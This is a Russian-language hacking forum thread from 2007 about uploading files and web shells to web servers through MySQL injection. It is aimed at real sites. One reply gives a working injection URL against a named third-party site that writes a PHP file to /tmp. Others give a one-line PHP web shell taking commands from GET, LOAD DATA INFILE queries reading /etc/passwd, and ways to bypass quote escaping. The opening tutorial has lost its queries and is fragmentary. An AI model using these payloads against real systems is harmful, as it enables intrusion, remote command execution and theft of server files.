Авторские статьи Загрузка файл через mysql inj.

Discussion in 'Статьи' started by guest3297, 27 Feb 2007.

  1. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Загрузка файл через mysql inj.

    [INTRO]
    Думаю будет полезно новичкам и тем у кого не было практики в этом вопросе. Статья узко направленная, поэтому маленькая по обьему. Побудило меня написать большое кол-во вопросов в icq. Тема Много где обсуждалась но нечего кроме теоритеческих данных не было сегодня мы полностью раскроем этот вопрос и протестим все на конкретном примере.

    [хек-хек]
    И так начнем.
    Наш подопытный:
    Есть SQL:
    Смотрим user() version() database()
    Версия 5 смотрим Какие таблицы есть.
    Тестовый вывод данных из бд.
    Проверяем на чтение файлов.
    C обходом фильтрации (Сдесь не требуеться.)
    Способ №1
    Проверям на запись файла общий синтаксис такой:
    Записываем (Когда будете тестить надо указывать уникальное имя файла, если такой файл уже будет то запись не произайдет. должна вывестись ошибка
    Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource). Записываемый в файл текст мы кодируем в 0x+hex сделать это можно тут (http://hack-shop.org.ru/?page=6&ln=ru)
    Способ №2
    Спсоб №3
    Проверям записалось ли???
    Записалось.

    Полный путь до www
    [PS]
    Видео урок можно скачать ТУТ

    Не стоит дефейсить сайт. Все данные предоставленные в статье предназначены только для ознакомления. С нетерпением жду коментов и вопросов. Спасибо за внимание.

    [ cash ] Hack-Shop.Org.Ru (c)​

     
    #1 guest3297, 27 Feb 2007
    Last edited: 27 Feb 2007
    16 people like this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    хыхы. Сказал бы кому спасибо за обнаружение иньекции =)
    Статья хорошая, но подобных уже полно
     
    3 people like this.
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2Spyder
    Прочитай интро и покажи мне такую же статью
    ps иньекцию нашел не я, а Spyder но думаю не это главное...
     
    1 person likes this.
  4. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Все хорошо, только еще стоит уточнить, что для проведения данной атаки у mysql юзера должны быть права на работу с файлами, что в последнее время практически нигде не встречается + при экранировании кавычек into outfile не работает.


    P.S. вижу что Слайдер просматривает тему, ща влепит минус за GET =))
     
    _________________________
    2 people like this.
  5. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Ну да ты прав.
    экранирование кавычек можно обходить

    Да не забываем посылать запросы post методом. а то тема долго не проживет. хотя видео снял :)
     
    2 people like this.
  6. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    однотипная статья....таких в инете полно...


    [cash] ты пишешь дохрена статей, но все на низком уровне, копай глубже.

    То что здесь написано даже ламеры знают... into outfile это не единственный способ вывести инфу в файл..... По крайне мере я знаю 3 способа....


    Оценка: 3-
    Тема сисек не раскрыта!
     
    1 person likes this.
  7. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2k1b0rg
    тебя вообще сложно удивить...
     
    1 person likes this.
  8. vmn

    vmn Elder - Старейшина

    Joined:
    16 Oct 2006
    Messages:
    26
    Likes Received:
    12
    Reputations:
    3
    Описанное тут есть в каждой статье по mysql-inj.

    Хотелось бы узнать поподробнее про другие способы заливки шелла в mysql. Про into outfile + magic_quotes On тоже хотелось бы узнать :)
     
  9. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Способ №2
    Спсоб №3
    ps обновил
     
  10. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Если я не ошибаюсь into outfile ''-- работает именно на одинарных ковычках только вида ' но не `.
    А так в общем молодец, за труды респект

    ps и еще хочу добавить, основная задача ведь не в записи левой строчки в файл а в записи веб шелла <?php system($_GET[cmd]); ?> . Допустим ты создал файл shell.php c данной строчкой в /tmp, но ведь это самый минимум, самое простое. Основная задача пронклудить файл, что сложнее(конечто же если сайт не дырявый). Но может быть альтернатва, если ты раскрыл полный путь и нашел какуе то папочку с правами на запись тогда все проще намного.
     
    #10 _Pantera_, 28 Feb 2007
    Last edited: 28 Feb 2007
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2_Pantera_
    ну потести на каком нить серве поставь себе mysql и phpmyadmin
    into outfile работает как `(%60) так и с ' (%27) кавычками с "(%22) не пробывал но по идее тоже должно работать.

    Посмотри внизу статьи полный путь до www зачем что то инлудить???
     
  12. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    работает ' и " а ковычки ` не работают я проверял, а ' (%27) и "(%22) воспринимается браузером одинаково
    можешь сам потестить
    http://www.caduser.ru/acad/index.php?ver_id=1+union+select+1,'qqqqqqqq',3,4+from+mysql.user+into+outfile+"/tmp/file111.php"--
    а инклудить надо для того что б шелл запустить, ведь он лижит не на сайте, а в /tmp

    ps попробуй на этом сайте проинклудить у меня не получилось если что стукне мне в аську или в пм
     
    #12 _Pantera_, 28 Feb 2007
    Last edited: 28 Feb 2007
  13. andy13

    andy13 Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    100
    Likes Received:
    15
    Reputations:
    3
    еще экранирование кавычек (т.е. magic_quotes_gpc = On) можно обойти с помощью char().
     
  14. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Посути это точно такой же способ, только в первом случае возможно добавление дополнительных символов в сохраняемый файл, которые просто так, к примеру, не получилось добавить, ну а второй, просто называется по другому, в любом случае, главного недостатка (неработаспособности при экранировании) они не лишены и отдельными способами заливки шела их выносить не стоит.
     
    _________________________
  15. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    868
    Likes Received:
    343
    Reputations:
    423
    Открой глаза, выше написано что при сохранении нельзя, а разговор сейчас именно об этом.
     
    _________________________
    1 person likes this.
  16. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    2andy13
    наркоман?

    2madnet
    Я не борюсь за звание супер хакера я делюсь своими знаниями с теми кто знает меньше меня. Я знаю недостаки этих спасобов и что написанно много статей я пытался только помочь тем кто разбираеться меньше, если вы считаете эту статью недостойной то просто удалите ее. Многие из AMA SM вообще нечего не пишут хотя античат думаю один из лучших he порталов со статьями.

    2all
    Если кто то из вас может дополнить то напишите, а говорить что это уже все знают смысл?
     
    #16 guest3297, 28 Feb 2007
    Last edited: 28 Feb 2007
    2 people like this.
  17. andy13

    andy13 Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    100
    Likes Received:
    15
    Reputations:
    3
    2madnet: да, действительно, я имел в виду обход кавычек при чтении файлов.
    не обратил внимание.
    2[ cash ]: нет
     
    1 person likes this.
  18. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Если файл не удается прочитать можно попробовать его в таблицу запихнуть

    PHP:
    LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n'

    LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table (colum1,column2)
    Если mysql ниже 3.2 то надо делать так

    PHP:
    LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE hack.table
    А использование INTO DUMPFILE вместо INTO OUTFILE делает дамп неразборчивым для чтения тк идет без ограничитей строк и стоблцов,это для BLOB данных.И кстати наиболее всего

    PHP:
    SELECT DATA INTO OUTFILE '/tmp/hack.txt' FIELDS TERMINATED BY ',' OPIONALLY ENCLODES BY '"' LINES TERMINATED BY '\n' FROM hack.table
     
    2 people like this.
  19. 4xks

    4xks Banned

    Joined:
    2 Mar 2007
    Messages:
    9
    Likes Received:
    0
    Reputations:
    -3
    интереснинькая статься - только сколько я не пробовал ети инекции всегда неполучалось в месте когда цыфры вводить нужно - поля не менялись - кто знает в чем трабла?
     
  20. Dark Angel

    Dark Angel Elder - Старейшина

    Joined:
    23 Nov 2005
    Messages:
    79
    Likes Received:
    4
    Reputations:
    0
    плз, выложите кто-нибудь видео ешё раз!